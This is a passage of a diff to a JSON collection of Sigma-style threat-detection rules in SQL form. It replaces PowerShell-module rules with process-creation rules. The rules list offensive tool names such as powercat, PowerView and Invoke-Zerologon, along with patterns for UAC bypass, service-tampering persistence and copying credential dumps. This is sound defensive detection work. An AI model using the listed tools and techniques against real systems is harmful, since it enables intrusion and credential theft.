'%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload 
LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (CommandLine LIKE '%.application%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Content.Outlook\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_malicious_commandlets.yml" + "filename": "proc_creation_win_hh_susp_execution.yml" }, { - "title": "AD Groups Or Users Enumeration Using PowerShell - PoshModule", - "id": "815bfc17-7fc6-4908-a55e-2f37b98cedb4", - "status": "test", - "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", - "author": "frack113", + "title": "PUA - Potential PE Metadata Tamper Using Rcedit", + "id": "0c92f2e6-f08f-4b73-9216-ecb0ca634689", + "status": "experimental", + "description": "Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.", + "author": "Micah Babinski", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.defense_evasion", + "attack.t1036.003", + "attack.t1036", + "attack.t1027.005", + "attack.t1027" ], "falsepositives": [ - "Administrator script" + "Legitimate use of the tool by administrators or users to update metadata of a binary" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR ContextInfo LIKE '%get-ADPrincipalGroupMembership%' ESCAPE '\\' OR (Payload LIKE '%get-aduser%' ESCAPE '\\' AND Payload LIKE '%-f %' ESCAPE '\\' AND Payload LIKE '%-pr %' ESCAPE '\\' AND Payload LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\') OR (ContextInfo LIKE '%get-aduser%' ESCAPE '\\' AND ContextInfo LIKE '%-f %' ESCAPE '\\' AND ContextInfo LIKE '%-pr %' ESCAPE '\\' AND ContextInfo LIKE '%DoesNotRequirePreAuth%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rcedit-x64.exe' ESCAPE '\\' OR Image LIKE '%\\\\rcedit-x86.exe' ESCAPE '\\') OR Description = 'Edit resources of exe' OR Product = 'rcedit') AND CommandLine LIKE '%--set-%' ESCAPE '\\' AND (CommandLine LIKE '%OriginalFileName%' ESCAPE '\\' OR CommandLine LIKE '%CompanyName%' ESCAPE '\\' OR CommandLine LIKE '%FileDescription%' ESCAPE '\\' OR CommandLine LIKE '%ProductName%' ESCAPE '\\' OR CommandLine LIKE '%ProductVersion%' ESCAPE '\\' OR CommandLine LIKE '%LegalCopyright%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_ad_group_reco.yml" + "filename": "proc_creation_win_pua_rcedit_execution.yml" }, { - "title": "Bad Opsec Powershell Code Artifacts", - "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", - "status": "test", - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", - "author": "ok @securonix invrep_de, oscd.community", + "title": "HackTool - Jlaive In-Memory Assembly Execution", + "id": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "status": "experimental", + "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", + 
"author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.003" ], "falsepositives": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.bat' ESCAPE '\\') AND ((Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%pwsh.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%+s%' ESCAPE '\\' AND CommandLine LIKE '%+h%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\')))" ], - "filename": "posh_pm_bad_opsec_artifacts.yml" + "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml" }, { - "title": "PowerShell Decompress Commands", - "id": "1ddc1472-8e52-4f7d-9f11-eab14fc171f5", - "status": "test", - "description": "A General detection for specific decompress commands in PowerShell logs. 
This could be an adversary decompressing files.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Msiexec Execute Arbitrary DLL", + "id": "6f4191bb-912b-48a8-9ce7-682769541e6d", + "status": "experimental", + "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1140" + "attack.t1218.007" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%Expand-Archive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND (CommandLine LIKE '% /y%' ESCAPE '\\' OR CommandLine LIKE '% -y%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' 
ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\'))))" ], - "filename": "posh_pm_decompress_commands.yml" + "filename": "proc_creation_win_msiexec_execute_dll.yml" }, { - "title": "Remote PowerShell Session (PS Module)", - "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "title": "UAC Bypass Using IEInstal - Process", + "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND Image LIKE 
'%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "posh_pm_remote_powershell_session.yml" + "filename": "proc_creation_win_uac_bypass_ieinstal.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", - "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "Potential Persistence Attempt Via Existing Service Tampering", + "id": "38879043-7e1e-47a9-8d46-6bec88e201df", + "status": "test", + "description": "Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", + "author": "Sreeman", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1543.003", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%config %' ESCAPE '\\' AND CommandLine LIKE '%binpath=%' ESCAPE '\\') OR (CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command=%' ESCAPE '\\')) OR (((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%FailureCommand%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%ImagePath%' ESCAPE '\\')) AND (CommandLine LIKE 
'%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin$%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh$%' ESCAPE '\\' OR CommandLine LIKE '%.reg$%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", + "title": "Nltest.EXE Execution", + "id": "903076ff-f442-475a-b667-4f246bcc203b", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Arun Chauhan", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.discovery", + "attack.t1016", + "attack.t1018", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe'))" ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_nltest_execution.yml" }, { - "title": "Suspicious 
PowerShell Download - PoshModule", - "id": "de41232e-12e8-49fa-86bc-c05c7e722df9", + "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", + "id": "044ba588-dff4-4918-9808-3f95e8160606", "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ContextInfo LIKE '%.DownloadFile(%' ESCAPE '\\' OR ContextInfo LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" ], - "filename": "posh_pm_susp_download.yml" + "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", - "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", + "status": "test", + "description": "Detects the creation of a schtask via 
PowerSploit or Empire Default Configuration.", + "author": "Markus Neis, @Karneades", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "07aa184a-870d-413d-893a-157f317f6f58", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". 
Which can be used to gather information about the target machine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", + "attack.discovery", "attack.execution", - "attack.t1059.001" + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_susp_gather_network_info_execution.yml" }, { - "title": "Alternate PowerShell Hosts - PowerShell Module", - "id": "64e8e417-c19a-475a-8d19-98ea705394cc", - "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Use of Forfiles For Execution", + "id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", + "status": "experimental", + "description": "Execute commands and binaries from the context of \"forfiles\". 
This is used as a LOLBIN for example to bypass application whitelisting.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" + "Legitimate use via a batch script or by an administrator." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ContextInfo LIKE '%' ESCAPE '\\' AND NOT (((ContextInfo LIKE '%= powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/System32/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\' OR ContextInfo LIKE '%= C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell%' ESCAPE '\\')) OR (ContextInfo LIKE '%= C:\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe -Embedding%' ESCAPE '\\') OR (ContextInfo LIKE '%ConfigSyncRun.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\dsac.exe%' ESCAPE '\\') OR (ContextInfo LIKE '%C:\\\\Windows\\\\system32\\\\wsmprovhost.exe -Embedding%' ESCAPE '\\') OR ((Payload LIKE '%Update-Help%' ESCAPE '\\' OR Payload LIKE '%Failed to update Help for the module%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR OriginalFileName = 'forfiles.exe') AND (CommandLine LIKE '% /p %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\') AND (CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% -m %' ESCAPE '\\') AND (CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\'))" ], - "filename": 
"posh_pm_alternate_powershell_hosts.yml" + "filename": "proc_creation_win_lolbin_forfiles.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module", - "id": "2f211361-7dce-442d-b78a-c04039677378", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Automated Collection Command Prompt", + "id": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "status": "test", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1119", + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR Payload REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR Payload REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR Payload REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR Payload REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR Payload REGEXP '\\$VerbosePreference\\.ToString\\(' OR Payload REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.docx%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx%' ESCAPE '\\' OR CommandLine LIKE '%.ppt%' ESCAPE '\\' OR CommandLine LIKE '%.pptx%' 
ESCAPE '\\' OR CommandLine LIKE '%.rtf%' ESCAPE '\\' OR CommandLine LIKE '%.pdf%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\') AND ((CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /b %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\') OR (OriginalFileName = 'FINDSTR.EXE' AND (CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /si %' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_susp_automated_collection.yml" }, { - "title": "Suspicious Get Information for SMB Share - PowerShell Module", - "id": "6942bd25-5970-40ab-af49-944247103358", + "title": "Perl Inline Command Execution", + "id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", "status": "experimental", - "description": "Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\nto identify potential systems of interest for Lateral Movement.\nNetworks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\n", - "author": "frack113", + "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. 
This is could be used as a way to launch a reverse shell or execute live perl code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Administrator script" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (Payload LIKE '%get-smbshare%' ESCAPE '\\' OR ContextInfo LIKE '%get-smbshare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\perl.exe' ESCAPE '\\' OR OriginalFileName = 'perl.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" ], - "filename": "posh_pm_susp_smb_share_reco.yml" + "filename": "proc_creation_win_perl_inline_command_execution.yml" }, { - "title": "Invoke-Obfuscation STDIN+ 